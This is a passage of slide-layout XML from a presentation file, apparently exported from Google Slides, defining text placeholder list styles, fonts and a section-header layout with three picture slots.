                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Google Shape;154;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="1478156"/>
            <a:ext cx="5703900" cy="2470800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="3200400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Google Shape;155;p15"/>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1_Section Header">
  <p:cSld name="11_Section Header">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="156" name="Shape 156"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Google Shape;157;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4294" y="1742175"/>
            <a:ext cx="9144000" cy="2995800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000D74"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Google Shape;158;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1095075"/>
            <a:ext cx="9144000" cy="316800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buNone/>
              <a:defRPr sz="2700">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFil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159" name="Google Shape;159;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Google Shape;160;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1451027" y="3053606"/>
            <a:ext cx="6408300" cy="2951700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371600" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828800" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="2743200" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="3200400" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Google Shape;161;p16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="3" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="54825" y="58200"/>
            <a:ext cx="2957700" cy="1629600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Google Shape;162;p16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="4" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3093298" y="58200"/>
            <a:ext cx="2957700" cy="1629600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="Google Shape;163;p16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="5" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6131772" y="58200"/>
            <a:ext cx="2957700" cy="1629600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="164" name="Google Shape;164;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="8602" l="0" r="0" t="8602"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="54825" y="58200"/>
            <a:ext cx="2957624" cy="1629678"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="165" name="Google Shape;165;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5224" l="0" r="0" t="12103"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3093300" y="58200"/>
            <a:ext cx="2957624" cy="1629674"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="166" name="Google Shape;166;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="6185" l="0" r="0" t="11114"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6131775" y="58200"/>
            <a:ext cx="2957626" cy="1629675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Google Shape;167;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1426613" y="1729406"/>
            <a:ext cx="6457200" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
